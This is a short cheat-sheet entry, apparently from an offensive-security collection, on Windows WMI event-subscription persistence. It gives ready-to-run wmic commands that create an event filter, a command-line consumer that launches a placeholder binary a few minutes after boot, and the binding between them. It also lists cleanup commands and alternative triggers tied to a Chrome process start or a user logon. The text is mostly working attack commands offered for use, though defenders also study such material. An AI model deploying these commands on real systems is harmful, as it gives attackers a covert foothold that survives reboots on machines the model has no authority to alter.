This persistence method uses the Win32_PerfFormattedData_PerfOS_System class and an uptime range to execute a binary on startup between 240 and 325 seconds
wmic /NAMESPACE:"\\root\subscription" PATH __EventFilter CREATE Name="Whatever", EventNameSpace="root\cimv2",QueryLanguage="WQL", Query="SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA 'Win32_PerfFormattedData_PerfOS_System' AND TargetInstance.SystemUpTime >= 240 AND TargetInstance.SystemUpTime < 325"
wmic /NAMESPACE:"\\root\subscription" PATH CommandLineEventConsumer CREATE Name="Whatever", ExecutablePath="C:\Windows\System32\YourBinary.exe",CommandLineTemplate="C:\Windows\System32\YourBinary.exe"
wmic /NAMESPACE:"\\root\subscription" PATH __FilterToConsumerBinding CREATE Filter="__EventFilter.Name=\"Whatever\"", Consumer="CommandLineEventConsumer.Name=\"Whatever\""
Cleanup
wmic /NAMESPACE:"\\root\subscription" PATH CommandLineEventConsumer name="Whatever" DELETE
wmic /NAMESPACE:"\\root\subscription" PATH __EventFilter WHERE name="Whatever" DELETE
wmic /NAMESPACE:"\\root\subscription" PATH __FilterToConsumerBinding WHERE Filter="__EventFilter.Name=\"Whatever\"" DELETE
Additional EventFilter Options
QUERY="SELECT * FROM Win32_ProcessStartTrace WHERE ProcessName= "chrome.exe"
QUERY="SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA 'Win32_LogonSession' AND TargetInstance.LogonType = 2"
References:
Win32_PerfFormattedData_PerfOS_System
PowershellOne
Liberty-Shell